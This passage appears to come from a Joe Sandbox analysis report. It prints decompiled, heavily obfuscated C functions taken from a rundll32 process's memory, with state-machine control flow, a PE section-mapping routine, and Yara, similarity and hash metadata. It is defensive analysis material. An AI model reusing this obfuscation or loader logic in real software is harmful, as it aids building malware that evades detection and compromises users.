                                                                      				void* _t273;
                                                                      				void* _t275;
                                                                      				void* _t276;
                                                                      				signed int _t278;
                                                                      				signed int _t279;
                                                                      				signed int _t280;
                                                                      				signed int _t281;
                                                                      				intOrPtr _t296;
                                                                      				void* _t297;
                                                                      				signed int* _t299;
                                                                      				void* _t306;
                                                                      
                                                                      				_t299 =  &_v112;
                                                                      				_v8 = 0x20016e;
                                                                      				_t296 = 0;
                                                                      				_t276 = __ecx;
                                                                      				_v4 = 0;
                                                                      				_t297 = 0x341554bf;
                                                                      				_v52 = 0xc9b1;
                                                                      				_v52 = _v52 | 0x2e528fe0;
                                                                      				_t278 = 0xb;
                                                                      				_v52 = _v52 * 0x55;
                                                                      				_v52 = _v52 ^ 0x617f5ce2;
                                                                      				_v100 = 0x134d;
                                                                      				_v100 = _v100 | 0x49cd1c97;
                                                                      				_v100 = _v100 << 0x10;
                                                                      				_v100 = _v100 / _t278;
                                                                      				_v100 = _v100 ^ 0x02e5e2d4;
                                                                      				_v24 = 0xae5f;
                                                                      				_t279 = 0x4b;
                                                                      				_v24 = _v24 / _t279;
                                                                      				_v24 = _v24 ^ 0x00004c4a;
                                                                      				_v112 = 0xcc08;
                                                                      				_v112 = _v112 << 6;
                                                                      				_v112 = _v112 | 0x88c75b70;
                                                                      				_t280 = 0x47;
                                                                      				_v112 = _v112 * 0x55;
                                                                      				_v112 = _v112 ^ 0x7a21016f;
                                                                      				_v64 = 0x9f4b;
                                                                      				_v64 = _v64 + 0x616b;
                                                                      				_v64 = _v64 + 0xe20a;
                                                                      				_v64 = _v64 ^ 0x0001dfd5;
                                                                      				_v28 = 0x1fae;
                                                                      				_v28 = _v28 / _t280;
                                                                      				_v28 = _v28 ^ 0x00004ec5;
                                                                      				_v104 = 0x5d77;
                                                                      				_v104 = _v104 + 0x537;
                                                                      				_v104 = _v104 ^ 0x96a0085a;
                                                                      				_v104 = _v104 << 0xc;
                                                                      				_v104 = _v104 ^ 0x06af5270;
                                                                      				_v108 = 0xb68c;
                                                                      				_v108 = _v108 + 0x2584;
                                                                      				_v108 = _v108 * 0x34;
                                                                      				_v108 = _v108 << 3;
                                                                      				_v108 = _v108 ^ 0x016589aa;
                                                                      				_v56 = 0x4faa;
                                                                      				_v56 = _v56 + 0xffff23d2;
                                                                      				_v56 = _v56 + 0xffff95f1;
                                                                      				_v56 = _v56 ^ 0xffff6d68;
                                                                      				_v60 = 0xec8;
                                                                      				_v60 = _v60 ^ 0x81b41c80;
                                                                      				_v60 = _v60 | 0x3699af79;
                                                                      				_v60 = _v60 ^ 0xb7bdea19;
                                                                      				_v68 = 0x17f7;
                                                                      				_v68 = _v68 * 0x21;
                                                                      				_v68 = _v68 << 2;
                                                                      				_v68 = _v68 ^ 0x000c2d44;
                                                                      				_v32 = 0xf9f5;
                                                                      				_v32 = _v32 | 0xd49d42a3;
                                                                      				_v32 = _v32 ^ 0xd49daf29;
                                                                      				_v72 = 0xd36d;
                                                                      				_v72 = _v72 + 0xffffdb20;
                                                                      				_v72 = _v72 ^ 0x00009306;
                                                                      				_v76 = 0x522c;
                                                                      				_t281 = 0x43;
                                                                      				_v76 = _v76 / _t281;
                                                                      				_v76 = _v76 * 0x6a;
                                                                      				_v76 = _v76 ^ 0x0000dde2;
                                                                      				_v12 = 0x1c43;
                                                                      				_v12 = _v12 ^ 0xefc0aea8;
                                                                      				_v12 = _v12 ^ 0xefc08e31;
                                                                      				_v48 = 0x803b;
                                                                      				_v48 = _v48 ^ 0x188f99f3;
                                                                      				_v48 = _v48 ^ 0x134b5df5;
                                                                      				_v48 = _v48 ^ 0x0bc40f93;
                                                                      				_v16 = 0xe843;
                                                                      				_v16 = _v16 >> 2;
                                                                      				_v16 = _v16 ^ 0x000063b5;
                                                                      				_v92 = 0xef1;
                                                                      				_v92 = _v92 + 0xffffaf3d;
                                                                      				_v92 = _v92 + 0xec79;
                                                                      				_v92 = _v92 * 0x5e;
                                                                      				_v92 = _v92 ^ 0x003efb8a;
                                                                      				_v20 = 0xa38a;
                                                                      				_v20 = _v20 >> 2;
                                                                      				_v20 = _v20 ^ 0x00006e81;
                                                                      				_v96 = 0xdc33;
                                                                      				_v96 = _v96 | 0xf1642443;
                                                                      				_v96 = _v96 + 0xffffa62c;
                                                                      				_v96 = _v96 >> 2;
                                                                      				_v96 = _v96 ^ 0x3c59759f;
                                                                      				_v36 = 0x935d;
                                                                      				_v36 = _v36 ^ 0x8b551063;
                                                                      				_v36 = _v36 ^ 0x8b558f98;
                                                                      				_v80 = 0xa58;
                                                                      				_v80 = _v80 >> 1;
                                                                      				_v80 = _v80 >> 0xa;
                                                                      				_v80 = _v80 ^ 0x00006691;
                                                                      				_v84 = 0x2438;
                                                                      				_v84 = _v84 | 0x4658edca;
                                                                      				_v84 = _v84 >> 0x10;
                                                                      				_v84 = _v84 ^ 0x01219229;
                                                                      				_v84 = _v84 ^ 0x01218cc4;
                                                                      				_v88 = 0x580e;
                                                                      				_v88 = _v88 | 0xb8772654;
                                                                      				_v88 = _v88 << 7;
                                                                      				_v88 = _v88 | 0x5f1f4a93;
                                                                      				_v88 = _v88 ^ 0x7fbf3adc;
                                                                      				_v40 = 0xd338;
                                                                      				_v40 = _v40 * 0x2d;
                                                                      				_v40 = _v40 ^ 0xc6aa335d;
                                                                      				_v40 = _v40 ^ 0xc68f75fb;
                                                                      				_v44 = 0xf949;
                                                                      				_v44 = _v44 << 0xd;
                                                                      				_v44 = _v44 >> 0xc;
                                                                      				_v44 = _v44 ^ 0x0001c255;
                                                                      				goto L1;
                                                                      				do {
                                                                      					while(1) {
                                                                      						L1:
                                                                      						_t306 = _t297 - 0x261de027;
                                                                      						if(_t306 > 0) {
                                                                      							break;
                                                                      						}
                                                                      						if(_t306 == 0) {
                                                                      							_t258 = E02006B54(_t276, _v52, _v100);
                                                                      							_t299 =  &(_t299[1]);
                                                                      							_t297 = 0x13a0f061;
                                                                      							_t296 = _t296 + _t258;
                                                                      							continue;
                                                                      						} else {
                                                                      							if(_t297 == 0x71bdf61) {
                                                                      								_t263 = E02002493();
                                                                      								_t299 = _t299 - 0xc + 0xc;
                                                                      								_t297 = 0x195a7642;
                                                                      								_t296 = _t296 + _t263;
                                                                      								continue;
                                                                      							} else {
                                                                      								if(_t297 == 0x13a0f061) {
                                                                      									_t268 = E02002493();
                                                                      									_t299 = _t299 - 0xc + 0xc;
                                                                      									_t297 = 0x71bdf61;
                                                                      									_t296 = _t296 + _t268;
                                                                      									continue;
                                                                      								} else {
                                                                      									if(_t297 == 0x195a7642) {
                                                                      										_t273 = E02002493();
                                                                      										_t299 = _t299 - 0xc + 0xc;
                                                                      										_t297 = 0x28ce47a5;
                                                                      										_t296 = _t296 + _t273;
                                                                      										continue;
                                                                      									} else {
                                                                      										if(_t297 == 0x24e4826b) {
                                                                      											_t275 = E02006B54(_t276 + 0x20, _v36, _v80);
                                                                      											_t299 =  &(_t299[1]);
                                                                      											_t297 = 0x262fff8d;
                                                                      											_t296 = _t296 + _t275;
                                                                      											continue;
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						goto L20;
                                                                      					}
                                                                      					if(_t297 == 0x262fff8d) {
                                                                      						_t251 = E02002493();
                                                                      						_t299 = _t299 - 0xc + 0xc;
                                                                      						_t297 = 0x558fb04;
                                                                      						_t296 = _t296 + _t251;
                                                                      					} else {
                                                                      						if(_t297 == 0x28ce47a5) {
                                                                      							_t256 = E02002493();
                                                                      							_t299 = _t299 - 0xc + 0xc;
                                                                      							_t297 = 0x2c38dfc0;
                                                                      							_t296 = _t296 + _t256;
                                                                      							goto L1;
                                                                      						} else {
                                                                      							if(_t297 == 0x2c38dfc0) {
                                                                      								_t257 = E02006B54(_t276 + 0x18, _v20, _v96);
                                                                      								_t299 =  &(_t299[1]);
                                                                      								_t297 = 0x24e4826b;
                                                                      								_t296 = _t296 + _t257;
                                                                      								goto L1;
                                                                      							} else {
                                                                      								if(_t297 == 0x341554bf) {
                                                                      									_t297 = 0x261de027;
                                                                      									goto L1;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					L20:
                                                                      				} while (_t297 != 0x558fb04);
                                                                      				return _t296;
                                                                      			}

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ,R$8$$C$JL$X$ka$w]$y
                                                                      • API String ID: 0-1177348588
                                                                      • Opcode ID: 08c96f82fba47343827c7bed5efdf3b11118330523bd83467504f0b3eac7eb9d
                                                                      • Instruction ID: 7dab1d5d3686bd605641be18169aff993626340f857d2a77c38ab59a65f47eb6
                                                                      • Opcode Fuzzy Hash: 08c96f82fba47343827c7bed5efdf3b11118330523bd83467504f0b3eac7eb9d
                                                                      • Instruction Fuzzy Hash: 9FC111B29093808FE358DF24D58941BFBE1BBC4758F104A2DF596A62A0D7B4CA49CF47
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ,R$8$$C$JL$X$ka$w]$y
                                                                      • API String ID: 0-1177348588
                                                                      • Opcode ID: 08c96f82fba47343827c7bed5efdf3b11118330523bd83467504f0b3eac7eb9d
                                                                      • Instruction ID: a22e17d01b5c5d3b4944882eb385f95a74c37a67fc67e2b2c7c749900f6b86f9
                                                                      • Opcode Fuzzy Hash: 08c96f82fba47343827c7bed5efdf3b11118330523bd83467504f0b3eac7eb9d
                                                                      • Instruction Fuzzy Hash: D0C131B29093818FD358CF69D58A40BFBE0BBC5748F104A1DF596A6260D7B4DA18CF87
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 99%
                                                                      			E01FFE044() {
                                                                      				intOrPtr _v8;
                                                                      				intOrPtr _v12;
                                                                      				char _v16;
                                                                      				intOrPtr _v20;
                                                                      				intOrPtr _v24;
                                                                      				char _v28;
                                                                      				char _v32;
                                                                      				char _v36;
                                                                      				signed int _v40;
                                                                      				signed int _v44;
                                                                      				signed int _v48;
                                                                      				signed int _v52;
                                                                      				signed int _v56;
                                                                      				signed int _v60;
                                                                      				signed int _v64;
                                                                      				signed int _v68;
                                                                      				signed int _v72;
                                                                      				signed int _v76;
                                                                      				signed int _v80;
                                                                      				signed int _v84;
                                                                      				signed int _v88;
                                                                      				signed int _v92;
                                                                      				signed int _v96;
                                                                      				signed int _v100;
                                                                      				signed int _v104;
                                                                      				signed int _v108;
                                                                      				signed int _v112;
                                                                      				signed int _v116;
                                                                      				intOrPtr _t217;
                                                                      				signed int _t229;
                                                                      				intOrPtr _t233;
                                                                      				intOrPtr _t234;
                                                                      				signed int _t236;
                                                                      				signed int _t237;
                                                                      				signed int _t238;
                                                                      				signed int _t239;
                                                                      				signed int _t240;
                                                                      				void* _t272;
                                                                      				char _t276;
                                                                      				signed int* _t277;
                                                                      				void* _t279;
                                                                      
                                                                      				_t277 =  &_v116;
                                                                      				_v24 = 0x1c11a0;
                                                                      				_t234 = 0;
                                                                      				_v20 = 0;
                                                                      				_v64 = 0x3d72;
                                                                      				_v64 = _v64 << 2;
                                                                      				_v64 = _v64 ^ 0x0000ca76;
                                                                      				_v68 = 0xf5cd;
                                                                      				_v68 = _v68 + 0xffff2303;
                                                                      				_v68 = _v68 << 0xd;
                                                                      				_v68 = _v68 ^ 0x031a7530;
                                                                      				_v96 = 0x9dde;
                                                                      				_t236 = 0x63;
                                                                      				_t272 = 0x178fbfee;
                                                                      				_v96 = _v96 / _t236;
                                                                      				_v96 = _v96 ^ 0xbe21e7a5;
                                                                      				_v96 = _v96 | 0x0866bec9;
                                                                      				_v96 = _v96 ^ 0xbe67b68d;
                                                                      				_v100 = 0xb412;
                                                                      				_v100 = _v100 | 0xcdc2e5f8;
                                                                      				_v100 = _v100 + 0x255c;
                                                                      				_v100 = _v100 ^ 0x3ca6a3af;
                                                                      				_v100 = _v100 ^ 0xf165da8a;
                                                                      				_v48 = 0xdf62;
                                                                      				_v48 = _v48 << 0xc;
                                                                      				_v48 = _v48 ^ 0x0df67e0a;
                                                                      				_v88 = 0x25f4;
                                                                      				_v88 = _v88 >> 2;
                                                                      				_v88 = _v88 + 0xffff1fdf;
                                                                      				_v88 = _v88 ^ 0xffff2442;
                                                                      				_v60 = 0x15df;
                                                                      				_v60 = _v60 / _t236;
                                                                      				_v60 = _v60 ^ 0x00004288;
                                                                      				_v80 = 0x3276;
                                                                      				_v80 = _v80 + 0xffff6148;
                                                                      				_v80 = _v80 >> 3;
                                                                      				_v80 = _v80 ^ 0x1fffb761;
                                                                      				_v84 = 0xd242;
                                                                      				_t237 = 0x2a;
                                                                      				_v84 = _v84 / _t237;
                                                                      				_v84 = _v84 + 0x4474;
                                                                      				_v84 = _v84 ^ 0x000073b3;
                                                                      				_v56 = 0xcf32;
                                                                      				_v56 = _v56 ^ 0x8ff9b71f;
                                                                      				_v56 = _v56 ^ 0x8ff93793;
                                                                      				_v116 = 0xfed9;
                                                                      				_v116 = _v116 + 0xbfa2;
                                                                      				_v116 = _v116 >> 0xa;
                                                                      				_v116 = _v116 * 0x49;
                                                                      				_v116 = _v116 ^ 0x00007060;
                                                                      				_v104 = 0xd971;
                                                                      				_v104 = _v104 >> 0xf;
                                                                      				_v104 = _v104 << 4;
                                                                      				_v104 = _v104 ^ 0xb0610f19;
                                                                      				_v104 = _v104 ^ 0xb061137f;
                                                                      				_v72 = 0x5818;
                                                                      				_v72 = _v72 << 9;
                                                                      				_v72 = _v72 + 0xc63d;
                                                                      				_v72 = _v72 ^ 0x00b0f2f6;
                                                                      				_v52 = 0x41b5;
                                                                      				_v52 = _v52 ^ 0x7ab325a0;
                                                                      				_v52 = _v52 ^ 0x7ab35b35;
                                                                      				_v108 = 0x4ac4;
                                                                      				_v108 = _v108 + 0xcc33;
                                                                      				_t238 = 0x38;
                                                                      				_v108 = _v108 / _t238;
                                                                      				_v108 = _v108 | 0xd9acbeeb;
                                                                      				_v108 = _v108 ^ 0xd9acd52b;
                                                                      				_v112 = 0x4e86;
                                                                      				_t239 = 0x47;
                                                                      				_v112 = _v112 * 0x38;
                                                                      				_v112 = _v112 >> 4;
                                                                      				_v112 = _v112 << 6;
                                                                      				_v112 = _v112 ^ 0x0044e3e3;
                                                                      				_v76 = 0x72be;
                                                                      				_v76 = _v76 << 5;
                                                                      				_v76 = _v76 << 0xf;
                                                                      				_v76 = _v76 ^ 0x2be030c0;
                                                                      				_v40 = 0x48f5;
                                                                      				_v40 = _v40 << 0xd;
                                                                      				_v40 = _v40 ^ 0x091e8e4b;
                                                                      				_v44 = 0x527b;
                                                                      				_v44 = _v44 + 0xffff49c6;
                                                                      				_v44 = _v44 ^ 0xffffdf12;
                                                                      				_v92 = 0xbc66;
                                                                      				_v92 = _v92 * 0x33;
                                                                      				_v92 = _v92 / _t239;
                                                                      				_t240 = 0x72;
                                                                      				_v92 = _v92 / _t240;
                                                                      				_v92 = _v92 ^ 0x0000393e;
                                                                      				_t271 = _v36;
                                                                      				_t276 = _v36;
                                                                      				goto L1;
                                                                      				do {
                                                                      					while(1) {
                                                                      						L1:
                                                                      						_t279 = _t272 - 0x178fbfee;
                                                                      						if(_t279 > 0) {
                                                                      							break;
                                                                      						}
                                                                      						if(_t279 == 0) {
                                                                      							_t272 = 0xe2793e3;
                                                                      							continue;
                                                                      						}
                                                                      						if(_t272 == 0x47767b9) {
                                                                      							E01FFDE81(_v112, _v32, _v76);
                                                                      							_t272 = 0x28fbaa29;
                                                                      							continue;
                                                                      						}
                                                                      						if(_t272 == 0x4d34f17) {
                                                                      							_t229 = E01FFF5E0(_v80, _v84, _v56,  &_v16,  &_v32, _v116);
                                                                      							_t277 =  &(_t277[4]);
                                                                      							asm("sbb esi, esi");
                                                                      							_t272 = ( ~_t229 & 0x361a5899) + 0x47767b9;
                                                                      							continue;
                                                                      						}
                                                                      						if(_t272 == 0x55060ae) {
                                                                      							_t272 = 0x28fbaa29;
                                                                      							if(_v36 > 2) {
                                                                      								_t233 = E02001090( *((intOrPtr*)(_t271 + 8)), _v88,  &_v28, _v60);
                                                                      								_v32 = _t233;
                                                                      								if(_t233 != 0) {
                                                                      									_t272 = 0x4d34f17;
                                                                      								}
                                                                      							}
                                                                      							continue;
                                                                      						}
                                                                      						if(_t272 != 0xe2793e3) {
                                                                      							goto L21;
                                                                      						} else {
                                                                      							_t276 = E02000DC5();
                                                                      							_t272 = 0x18910253;
                                                                      							continue;
                                                                      						}
                                                                      					}
                                                                      					if(_t272 == 0x18910253) {
                                                                      						_t217 = E01FF74A7(_v68, _v96, _v100,  &_v36, _t276, _v48);
                                                                      						_t271 = _t217;
                                                                      						_t277 =  &(_t277[4]);
                                                                      						if(_t217 == 0) {
                                                                      							_t272 = 0x3b81234c;
                                                                      							goto L21;
                                                                      						}
                                                                      						_t272 = 0x55060ae;
                                                                      						goto L1;
                                                                      					}
                                                                      					if(_t272 == 0x28fbaa29) {
                                                                      						E02001C64(_v40, _v44, _v92, _t271);
                                                                      						L24:
                                                                      						return _t234;
                                                                      					}
                                                                      					if(_t272 != 0x3a91c052) {
                                                                      						goto L21;
                                                                      					}
                                                                      					_t185 =  &_v108; // 0x44e3e3
                                                                      					E020021A5(_v104, _v72, _v12, _v8 + 1, _v52,  *0x2011088 + 0x38,  *_t185);
                                                                      					_t277 =  &(_t277[5]);
                                                                      					_t234 = 1;
                                                                      					_t272 = 0x47767b9;
                                                                      					 *((intOrPtr*)( *0x2011088 + 0xc)) = _v16;
                                                                      					goto L1;
                                                                      					L21:
                                                                      				} while (_t272 != 0x3b81234c);
                                                                      				goto L24;
                                                                      			}

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: >9$\%$`p$tD$v2${R$D$D
                                                                      • API String ID: 0-2873933158
                                                                      • Opcode ID: bbddb9203957df02dec585f6924e82c5eea2bee525b51d5e8b8249602370e4c5
                                                                      • Instruction ID: 9f30710e393f5f055cd4e68c01a1df6979a44ce5ac21097d998d31fbac3cf595
                                                                      • Opcode Fuzzy Hash: bbddb9203957df02dec585f6924e82c5eea2bee525b51d5e8b8249602370e4c5
                                                                      • Instruction Fuzzy Hash: F0B1317290C3419FE354CF29C48980BBBE1FBD4758F418A1DF6E996260D3B5DA098F86
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: >9$\%$`p$tD$v2${R$D$D
                                                                      • API String ID: 0-2873933158
                                                                      • Opcode ID: d239047f8fd533ba29a1152434985cbeae24259cbc72a2d0326ef89d7b38c88b
                                                                      • Instruction ID: 56a122e249e5c1a15f0186e46f1c442f2379ef1c81f8210aa6b8861ad1fdf663
                                                                      • Opcode Fuzzy Hash: d239047f8fd533ba29a1152434985cbeae24259cbc72a2d0326ef89d7b38c88b
                                                                      • Instruction Fuzzy Hash: 38B154B291C3419FD354CF25C48940BBBE2FBD4358F40892DF5A996260D3B4EA5ACF86
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 90%
                                                                      			E01FF5B7D(void* __ecx, intOrPtr* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                      				intOrPtr _v4;
                                                                      				intOrPtr _v8;
                                                                      				intOrPtr _v12;
                                                                      				intOrPtr _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      				signed int _v36;
                                                                      				signed int _v40;
                                                                      				signed int _v44;
                                                                      				signed int _v48;
                                                                      				signed int _v52;
                                                                      				signed int _v56;
                                                                      				signed int _v60;
                                                                      				signed int _v64;
                                                                      				signed int _v68;
                                                                      				intOrPtr _t120;
                                                                      				void* _t128;
                                                                      				void* _t136;
                                                                      				void* _t138;
                                                                      				signed int _t140;
                                                                      				void* _t157;
                                                                      				void* _t162;
                                                                      				intOrPtr* _t164;
                                                                      				signed int* _t166;
                                                                      				signed int* _t167;
                                                                      				signed int* _t168;
                                                                      
                                                                      				_t164 = __edx;
                                                                      				_push(0);
                                                                      				_push(_a12);
                                                                      				_push(_a8);
                                                                      				_push(_a4);
                                                                      				_push(__edx);
                                                                      				_push(__ecx);
                                                                      				_t120 = E02002550(0);
                                                                      				_v8 = _t120;
                                                                      				_v4 = _t120;
                                                                      				_v16 = 0xc2989;
                                                                      				_v12 = 0x5a483c;
                                                                      				_v52 = 0x3b44;
                                                                      				_v52 = _v52 << 7;
                                                                      				_t140 = 0x4c;
                                                                      				_v52 = _v52 * 0x47;
                                                                      				_v52 = _v52 ^ 0x0837fe00;
                                                                      				_v60 = 0x214b;
                                                                      				_v60 = _v60 + 0xffff3690;
                                                                      				_v60 = _v60 + 0x4bfa;
                                                                      				_v60 = _v60 >> 0xd;
                                                                      				_v60 = _v60 ^ 0x0007dffd;
                                                                      				_v68 = 0xfe09;
                                                                      				_v68 = _v68 + 0x553f;
                                                                      				_v68 = _v68 * 0x1d;
                                                                      				_v68 = _v68 ^ 0x1b24c5d9;
                                                                      				_v68 = _v68 ^ 0x1b02eedd;
                                                                      				_v36 = 0xe0e0;
                                                                      				_v36 = _v36 | 0x0a33301d;
                                                                      				_v36 = _v36 ^ 0x0a33cb55;
                                                                      				_v40 = 0x9bfa;
                                                                      				_v40 = _v40 * 0x75;
                                                                      				_v40 = _v40 ^ 0x004737ff;
                                                                      				_v28 = 0x4d67;
                                                                      				_v28 = _v28 * 0x2c;
                                                                      				_v28 = _v28 ^ 0x000d0c51;
                                                                      				_v64 = 0x3be;
                                                                      				_v64 = _v64 + 0xc067;
                                                                      				_v64 = _v64 + 0x5cfa;
                                                                      				_v64 = _v64 / _t140;
                                                                      				_v64 = _v64 ^ 0x0000016e;
                                                                      				_v32 = 0x9b8d;
                                                                      				_v32 = _v32 >> 0xf;
                                                                      				_v32 = _v32 ^ 0x00006036;
                                                                      				_v48 = 0x458d;
                                                                      				_v48 = _v48 >> 3;
                                                                      				_v48 = _v48 + 0xffffc11e;
                                                                      				_v48 = _v48 ^ 0xffffb28b;
                                                                      				_v24 = 0x2d22;
                                                                      				_v24 = _v24 + 0xffff832a;
                                                                      				_v24 = _v24 ^ 0xffffbd86;
                                                                      				_v44 = 0xc1ed;
                                                                      				_v44 = _v44 << 0xa;
                                                                      				_v44 = _v44 << 0xd;
                                                                      				_v44 = _v44 ^ 0xf6803b82;
                                                                      				_v20 = 0x855f;
                                                                      				_v20 = _v20 >> 7;
                                                                      				_v20 = _v20 ^ 0x00003be3;
                                                                      				_v56 = 0x7b80;
                                                                      				_v56 = _v56 * 0x26;
                                                                      				_v56 = _v56 + 0xffff7d11;
                                                                      				_v56 = _v56 ^ 0x0011d251;
                                                                      				_t141 = _v68;
                                                                      				_t128 = E020098B1(_v68, _v36, _v40, __edx);
                                                                      				_t166 =  &(( &_v68)[8]);
                                                                      				_t136 = _t128;
                                                                      				if(_t136 != 0) {
                                                                      					_t157 = E02002A07( *((intOrPtr*)(_t136 + 0x50)), _v60 | _v52, _v28, _t141, _v64, _v56, _v32);
                                                                      					_t167 =  &(_t166[5]);
                                                                      					if(_t157 == 0) {
                                                                      						L6:
                                                                      						return _t157;
                                                                      					}
                                                                      					E01FF6374(_v48, _t157,  *((intOrPtr*)(_t136 + 0x54)),  *__edx, _v24);
                                                                      					_t168 =  &(_t167[3]);
                                                                      					_t162 = ( *(_t136 + 0x14) & 0x0000ffff) + 0x18 + _t136;
                                                                      					_t138 = ( *(_t136 + 6) & 0x0000ffff) * 0x28 + _t162;
                                                                      					while(_t162 < _t138) {
                                                                      						_t134 =  <  ?  *((void*)(_t162 + 8)) :  *((intOrPtr*)(_t162 + 0x10));
                                                                      						E01FF6374(_v44,  *((intOrPtr*)(_t162 + 0xc)) + _t157,  <  ?  *((void*)(_t162 + 8)) :  *((intOrPtr*)(_t162 + 0x10)),  *_t164 +  *((intOrPtr*)(_t162 + 0x14)), _v20);
                                                                      						_t168 =  &(_t168[3]);
                                                                      						_t162 = _t162 + 0x28;
                                                                      					}
                                                                      					goto L6;
                                                                      				}
                                                                      				return _t128;
                                                                      			}


                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "-$6`$<HZ$?U$D;$K!$gM$;
                                                                      • API String ID: 0-541240929
                                                                      • Opcode ID: 351712b6d6cbc9e8907103eb125a307d12d6f643fa008f15f0959c67586ec1b1
                                                                      • Instruction ID: 3bf43c11c6579670f34c88f009f848d3a2599e40b5ec9b21dcd7c81191ed52bc
                                                                      • Opcode Fuzzy Hash: 351712b6d6cbc9e8907103eb125a307d12d6f643fa008f15f0959c67586ec1b1
                                                                      • Instruction Fuzzy Hash: 795112B1408340AFD354CF65C88980BFBF5BBC4758F408A1DFA99962A0D7BAD949CF06
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "-$6`$<HZ$?U$D;$K!$gM$;
                                                                      • API String ID: 0-541240929
                                                                      • Opcode ID: bd18d84c34761732b3e16a2086b9908adac1db33b08af174a17316736eeaa7c0
                                                                      • Instruction ID: 1e5f564ab5450714ec5b4b3b7669279cec54aeee8b2739e58acacade9e586203
                                                                      • Opcode Fuzzy Hash: bd18d84c34761732b3e16a2086b9908adac1db33b08af174a17316736eeaa7c0
                                                                      • Instruction Fuzzy Hash: 4E5122B1418340AFD358CF65C98980BFBF5BBC4758F408A1DF99A96260D3BAC959CF06
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: !i$&4$'$)*$4j\$IX$Y^$\
                                                                      • API String ID: 0-1966681874
                                                                      • Opcode ID: 2ab281e20babec8f914e23fe26d2a0305b4f6cc775f439d274d1a935f3a080a8
                                                                      • Instruction ID: bce125f109882f6d9395106b2c9a14880b400f11d5eb6f12cfdc546ed44c3ac5
                                                                      • Opcode Fuzzy Hash: 2ab281e20babec8f914e23fe26d2a0305b4f6cc775f439d274d1a935f3a080a8
                                                                      • Instruction Fuzzy Hash: 9C512571C0121AEBEF19CFE5D94A5EEBBB1FF05304F208199D511B62A0D7B90A69CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 95%
                                                                      			E01FF4844() {
                                                                      				char _v520;
                                                                      				char _v1040;
                                                                      				signed int _v1044;
                                                                      				signed int _v1048;
                                                                      				signed int _v1052;
                                                                      				signed int _v1056;
                                                                      				signed int _v1060;
                                                                      				signed int _v1064;
                                                                      				signed int _v1068;
                                                                      				signed int _v1072;
                                                                      				unsigned int _v1076;
                                                                      				signed int _v1080;
                                                                      				signed int _v1084;
                                                                      				signed int _v1088;
                                                                      				signed int _v1092;
                                                                      				signed int _v1096;
                                                                      				signed int _v1100;
                                                                      				signed int _v1104;
                                                                      				signed int _v1108;
                                                                      				signed int _v1112;
                                                                      				signed int _v1116;
                                                                      				signed int _v1120;
                                                                      				unsigned int _v1124;
                                                                      				signed int _v1128;
                                                                      				signed int _v1132;
                                                                      				signed int _v1136;
                                                                      				signed int _v1140;
                                                                      				signed int _v1144;
                                                                      				signed int _v1148;
